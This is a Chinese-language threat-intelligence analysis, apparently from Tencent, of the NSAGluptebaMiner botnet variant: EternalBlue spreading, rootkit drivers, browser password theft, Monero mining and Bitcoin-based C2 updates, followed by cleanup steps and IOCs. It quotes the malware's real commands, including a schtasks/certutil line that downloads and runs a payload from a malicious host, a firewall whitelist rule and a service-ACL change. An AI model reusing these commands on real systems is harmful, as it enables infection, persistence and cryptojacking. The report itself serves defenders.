感谢腾讯御见威胁情报中心来稿！

原文链接：https://mp.weixin.qq.com/s/mdgGiYwb722GuE6QtJTzPQ

一、概述

腾讯安全威胁情报中心检测到挖矿僵尸 *** NSAGluptebaMiner变种正在利用永恒之蓝漏洞攻击传播。目前该僵尸 *** 会控制机器进行门罗币挖矿和搜集用户隐私数据，并具有远程执行命令的功能，同时还会利用比特币交易数据更新C2。

cloudnet.exe原来是Glupteba恶意木马，Glupteba最早作为Operation Windigo组织用于部署僵尸 *** 中的一部分首次出现，2018年6月腾讯安全威胁情报中心发现cloudnet.exe开始作为挖矿僵尸 *** NSAGluptebaMiner的组件传播。

当前NSAGluptebaMiner版本具有以下特征：

利用永恒之蓝漏洞攻击传播；

安装计划任务实现持久化，任务利用certutil.exe下载木马；

利用密码提取器updateprofile.exe搜集浏览器记录的账号密码并上传；

绕过UAC，以管理员权限和系统权限运行，将木马程序加入防火墙策略白名单、Windows Defender查杀白名单；

安装驱动Winmon.sys、WinmonFS.sys、WinmonProcessMonitor.sys对木马进行保护；

运行门罗币挖矿程序wup.exe；

利用组件cloudnet.exe构建僵尸 *** ；

连接远程服务器，接收指令完成远控操作；

通过比特币交易数据更新C2地址。

二、详细分析

漏洞攻击成功后，Payload首先下载app.exe在内存中执行PE文件，并且将该文件释放到C:\Windows\rss\csrss.exe，csrss.exe是一个木马下载器，采用Go编程语言编写。

下载器首先获取当前应用程序信息、安装杀软信息、操作系统信息、硬件GPU、是否Admin用户，以及一些以二进制形式硬编码的信息来初始化“配置信息”，然后创建一个注册表项HKEY_CURRENT_USER\Software\Microsoft\<random>（8位随机字符）来存储所有获取的信息。（之前注册表为HKEY_USERS\ <sid>\Software\Microsoft\TestApp）

首先会检测是否在虚拟机中执行。

然后判断是否是系统权限，如果不是则通过以TrustedInstaller运行自己提高权限。

在”C:\Windows\System32\drivers\”目录下释放三个隐藏的sys文件，并加载对应的驱动程序：

• Winmon.sys用于隐藏对应PID进程；
• WinmonFS.sys隐藏指定文件或目录；
• WinmonProcessMonitor.sys查找指定进程，并关闭。

维护以系统服务的方式启动的木马（检查服务、下载安装服务、更新服务、删除服务）。

下载永恒之蓝漏洞漏洞利用程序，利用漏洞攻击局域网机器。

下载矿机和挖矿 *** 配置信息。

获取Glupteba僵尸 *** *** 程序Cloudnet.exe使用的下载地址和hash。

在handleCommand函数中实现后门功能，包括下载文件、程序执行等。

各函数及对应操作如下：

函数 操作 GetAppName 获取App名 IsAdmin 是否Admin账号 ProcessIsRunning 进程是否运行 Update 更新 Exec 执行程序 Download 下载 DownloadAndRun 下载并执行 DownloadAndRunExtended 下载并执行扩展 Exit 退出 UpdateData 更新数据 UpdateCloudnet 更新cloudnet.exe StopWUP 停止挖矿程序wup.exe UpdateService 更新服务 GetLogfileProxy 读取日志文件\proxy\t GetLogfileI2Pd 读取日志文件\i2pd\i2pd.log Notify 开启心跳包，在指定的时间间隔进行上报 NotifyHost 上报主机 EventExists 判断event是否存在 MutexExists 判断Mutuex是否存在 RegistryGetStartup 注册自启动项 VerifySignature 验证文件签名 RegistryGetStartupSignatures 验证启动项文件签名 VerifyProcessesSignatures 验证进程文件签名 GetUnverifiedFiles 上报未签名的文件 GetStatsWUP 获取挖矿木马统计信息 UploadFile 上传文件 Install 下载并安装 SC 截屏 UpdateCDN 更新C2 DiscoverElectrum 使用硬编码的以太币钱包，读取区块链交易数据 DiscoverBlockchaincom

从区块链交易数据中获取加密的新的C2地址

设置防火墙规则，将csrss.exe添加到白名单：

`netsh advfirewall firewall add rule name=”csrss” dir=in action=allow program=”C:\Windows\rss\csrss.exe” enable=yes`

写入windows defender规则，添Winmon、WinmonFS、WinmonProcessMonitor加到白名单：

cmd.exe /C sc sdset Winmon D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

安装名为“ScheduledUpdate”的计划任务，任务内容为：每当用户登陆时，利用certutil.exe下载app.exe，保存为scheduled.exe并运行：

`schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR “cmd.exe /C certutil.exe -urlcache -split -f https[:]//biggames.online/app/app.exe C:\Users\admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\admin\AppData\Local\Temp\csrss\scheduled.exe /31340” /TN ScheduledUpdate /F`

灵活更新C2：

通过公开的列表查询Electrum比特币钱包服务器，使用硬编码的hash值查询对应的区块链脚本hash记录，对返回的数据进行AES解密得到新的C2地址。

组件updateprofile.exe为密码提取器，也使用Go编写，并使用UPX壳保护。
运行后搜集包括Chrome，Opera和Yandex浏览器的cookie、历史记录和其他配置文件中的账号密码，打包上传到远程服务器。

组件cloudnet.exe负责构建僵尸 *** ， 会读取注册表中存放的UUID进行校验，在注册表“HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CloudNet”下写入文件版本、路径等信息，移动自身到“\cloudnet\”文件夹下，连接C2服务器，接收远控指令。

组件wup.exe负责挖矿门罗币，csrss.exe启动wup.exe时传递参数

`C:\Users\Administrator\AppData\Local\Temp\wup\wup.exe -o stratum+tcp[:]//premiumprice.shop:50001 -u d244dab5-f080-4e0d-a79c-4eeb169b351b -p x –nicehash -k –api-port=3433 –api-access-token=d244dab5-f080-4e0d-a79c-4eeb169b351b –http-port=3433 –http-access-token=d244dab5-f080-4e0d-a79c-4eeb169b351b –donate-level=1 –randomx-wrmsr=-1 –background`

Temp目录下的wup.exe负责下载矿机程序和挖矿配置文件，最后执行另一同名文件C:\Users\Administrator\AppData\Local\Temp\csrss\wup\xarch\wup.exe开启挖矿，该文件由开源挖矿程序XMRig编译。

 

三、安全建议

企业网管可以使用腾讯T-Sec终端安全管理系统清除病毒。

也可检查以下各项，如有进行清除：

目录和文件：
C:\Users\Administrator\AppData\LoCal\Temp\Csrss\ *** b\
C:\users\administrator\appdata\loCal\temp\Csrss\
C:\Windows\rss\Csrss.exe
C:\Windows\windefender.exe
C:\Windows\System32\drivers\Winmon.sys
C:\Windows\System32\drivers\WinmonFS.sys
C:\Windows\System32\drivers\WinmonProCessMonitor.sys
C:\users\administrator\appdata\loCal\temp\Csrss\Cloudnet.exe
C:\Users\Administrator\AppData\LoCal\Temp\Csrss\sCheduled.exe
C:\Users\Administrator\AppData\LoCal\Temp\Csrss\updateprofile.exe
C:\Users\Administrator\AppData\LoCal\Temp\wup\wup.exe
C:\Users\Administrator\AppData\LoCal\Temp\Csrss\wup\xarCh\wup.exe

注册表：
HKEY_CURRENT_USER\SOFTWARE\MiCrosoft\TestApp
HKEY_CURRENT_USER\SOFTWARE\MiCrosoft\<random>\<random>
HKEY_CURRENT_USER\SOFTWARE\EpiCNet InC.\CloudNet
HKEY_CURRENT_USER\Software\MiCrosoft\<random>
HKEY_LOCAL_MACHINE\System\CurrentControlSet\ServiCes\Winmon
HKEY_LOCAL_MACHINE\System\CurrentControlSet\ServiCes\WinmonFS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\ServiCes\WinmonProCessMonitor
HKEY_USERS\sid\Software\MiCrosoft\Windows\CurrentVersion\Run\DeliCateFrost

计划任务：
ScheduledUpdate

IOCs

Domain
biggames.club
biggames.online
deepsound.live
sndvoices.com
2makestorage.com
infocarnames.ru

URL
http[:]//biggames.club/app/app.exe
https[:]//infocarnames.ru/ru53332/-RTMD-AIyBxl2ebgAAvhwCAEVTFwAfAOm6EgMA.exe

md5
b1c081429c23e3ef0268fd33e2fe79f9
da75bc9d4d74a7ae4883bfa66aa8e99b
00201e5ad4e27ff63ea32fb9a9bb2c2e
6918fd63f9ec3126b25ce7f059b7726a
fcf8643ff7ffe5e236aa957d108958c9
9b47b9f19455bf56138ddb81c93b6c0c
0dbecc91932301ccc685b9272c717d61

矿池：

premiumprice.shop:50001

参考链接

https://www.freebuf.com/articles/system/172929.html

https://blog.trendmicro.com/trendlabs-security-intelligence/glupteba-campaign-hits-network-routers-and-updates-cc-servers-with-data-from-bitcoin-transactions/